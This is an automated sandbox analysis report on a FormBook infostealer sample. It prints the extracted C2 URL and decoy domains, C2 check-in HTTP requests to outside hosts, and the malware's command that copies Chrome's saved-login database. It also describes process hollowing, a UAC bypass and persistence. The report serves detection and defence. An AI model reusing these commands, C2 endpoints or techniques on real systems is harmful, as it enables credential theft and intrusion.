Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TR0627729920002.exe

Overview

General Information

Sample Name:TR0627729920002.exe
Analysis ID:680563
MD5:8dbfe68662123710d83fef939287d9a3
SHA1:9481ef5498dd490e4efe83601f916ee48f61e649
SHA256:663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TR0627729920002.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\TR0627729920002.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
    • cmd.exe (PID: 564 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Jwjxmakrv.exe (PID: 2460 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Jwjxmakrv.exe (PID: 5912 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 3464 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3060 cmdline: /c del "C:\Windows\SysWOW64\cmd.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5440 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • IconCachet0hh.exe (PID: 5220 cmdline: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\vrkamxjwJ.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x59:$hotkey: \x0AHotKey=7
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\vrkamxjwJ.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
    00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
      00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6581:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cd30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9def:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x16547:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 66 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.0.cmd.exe.50410000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.cmd.exe.50410000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5781:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x8fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x15747:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.0.cmd.exe.50410000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.0.cmd.exe.50410000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          5.0.cmd.exe.50410000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 37 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.338.54.163.5749861802031449 08/08/22-20:15:40.535789
            SID:2031449
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031453 08/08/22-20:16:21.818812
            SID:2031453
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031449 08/08/22-20:14:24.056805
            SID:2031449
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.338.54.163.5749861802031412 08/08/22-20:15:40.535789
            SID:2031412
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031412 08/08/22-20:16:21.818812
            SID:2031412
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.338.54.163.5749861802031453 08/08/22-20:15:40.535789
            SID:2031453
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031453 08/08/22-20:14:29.416650
            SID:2031453
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031453 08/08/22-20:14:24.056805
            SID:2031453
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031412 08/08/22-20:14:24.056805
            SID:2031412
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031449 08/08/22-20:14:29.416650
            SID:2031449
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031449 08/08/22-20:14:34.726453
            SID:2031449
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031412 08/08/22-20:14:29.416650
            SID:2031412
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031449 08/08/22-20:16:21.818812
            SID:2031449
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031453 08/08/22-20:14:34.726453
            SID:2031453
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031412 08/08/22-20:14:34.726453
            SID:2031412
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: TR0627729920002.exeReversingLabs: Detection: 29%
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Antivirus detection for URL or domain
            Source: http://www.trisuaka.xyz/uj3c/Avira URL Cloud: Label: malware
            Source: http://www.nomaxdic.com/uj3c/Avira URL Cloud: Label: malware
            Source: www.nutricognition.com/uj3c/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: kidsfundoor.comVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeReversingLabs: Detection: 29%
            Machine Learning detection for sample
            Source: TR0627729920002.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeJoe Sandbox ML: detected
            Source: 5.2.cmd.exe.50410000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.TR0627729920002.exe.2162de8.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 5.0.cmd.exe.50410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

            Exploits

            barindex
            Yara detected UAC Bypass using ComputerDefaults
            Source: Yara matchFile source: 0.2.TR0627729920002.exe.2162de8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TR0627729920002.exe.2162de8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Jwjxmakrv.exe PID: 5912, type: MEMORYSTR
            Source: TR0627729920002.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.gografic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.55.180.56 80
            Source: C:\Windows\explorer.exeDomain query: www.moneytaoism.com
            Source: C:\Windows\explorer.exeDomain query: www.naturathome.info
            Source: C:\Windows\explorer.exeDomain query: www.6111.site
            Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.187 80
            Source: C:\Windows\explorer.exeNetwork Connect: 38.54.163.57 80
            Source: C:\Windows\explorer.exeDomain query: www.kidsfundoor.com
            Source: C:\Windows\explorer.exeDomain query: www.choonchain.com
            Source: C:\Windows\explorer.exeDomain query: www.empireapothecary.com
            Source: C:\Windows\explorer.exeDomain query: www.huangse5.com
            Source: C:\Windows\explorer.exeDomain query: www.nutricognition.com
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80
            Source: C:\Windows\explorer.exeDomain query: www.trisuaka.xyz
            Source: C:\Windows\explorer.exeDomain query: www.trendiddas.com
            Source: C:\Windows\explorer.exeDomain query: www.nomaxdic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
            Source: C:\Windows\explorer.exeNetwork Connect: 156.226.60.131 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.designgamagazine.com
            Source: C:\Windows\explorer.exeDomain query: www.shopwithtrooperdavecom.com
            Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Performs DNS queries to domains with low reputation
            Source: C:\Windows\explorer.exeDNS query: www.trisuaka.xyz
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.nutricognition.com/uj3c/
            Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
